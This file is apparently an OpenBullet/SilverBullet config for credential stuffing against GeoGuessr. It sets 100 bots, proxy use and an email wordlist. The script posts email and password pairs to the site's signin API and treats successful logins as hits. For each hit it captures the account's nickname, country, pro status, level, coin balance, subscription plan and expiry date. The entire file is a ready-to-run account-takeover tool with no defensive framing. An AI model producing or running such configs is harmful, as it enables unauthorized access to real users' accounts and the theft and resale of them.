[SETTINGS]
{
  "Name": "GeoGuessr",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2024-09-01T03:33:33.3333333-07:00",
  "AdditionalInfo": "github.com/0xSums",
  "RequiredPlugins": [],
  "Author": "✧",
  "Version": "[t.me/imSums]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "Email",
  "AllowedWordlist2": "Default",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "GeoGuessr",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#*/api/v3/accounts/signin REQUEST POST "https://www.geoguessr.com/api/v3/accounts/signin" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "X-Client: web" 

#200_OK? KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" EqualTo "200" 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" EqualTo "401" 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" EqualTo "429" 

#nick PARSE "<SOURCE>" JSON "nick" CreateEmpty=FALSE -> CAP "User" 

#countryCode PARSE "<SOURCE>" JSON "countryCode" -> VAR "CC" 

#Country FUNCTION ToUppercase "<CC>" -> CAP "Country" 

#isProUser PARSE "<SOURCE>" JSON "isProUser" -> VAR "IP" 

#isProUser FUNCTION Translate 
  KEY "False" VALUE "✗" 
  KEY "True" VALUE "✓" 
  "<IP>" -> CAP "isPro" 

#level PARSE "<SOURCE>" JSON "level" CreateEmpty=FALSE -> CAP "Lvl" 

#*/api/v3/profiles/wallet REQUEST GET "https://www.geoguessr.com/api/v3/profiles/wallet" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "X-Client: web" 

#coins PARSE "<SOURCE>" JSON "coins" -> VAR "C" 

#mobileCoins PARSE "<SOURCE>" JSON "mobileCoins" -> VAR "MC" 

#totalCoins FUNCTION Compute "<C>+<MC>" -> CAP "Coins" 

#isPro? KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" AND 
    KEY "<isPro>" EqualTo "✗" 
    KEY "<Coins>" LessThan "10000" 

#*/api/v3/subscriptions/all REQUEST GET "https://www.geoguessr.com/api/v3/subscriptions/all" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "X-Client: web" 

#plan PARSE "<SOURCE>" JSON "plan" CreateEmpty=FALSE -> CAP "Plan" 

#periodEndsAt PARSE "<SOURCE>" JSON "periodEndsAt" CreateEmpty=FALSE -> CAP "Exp" 

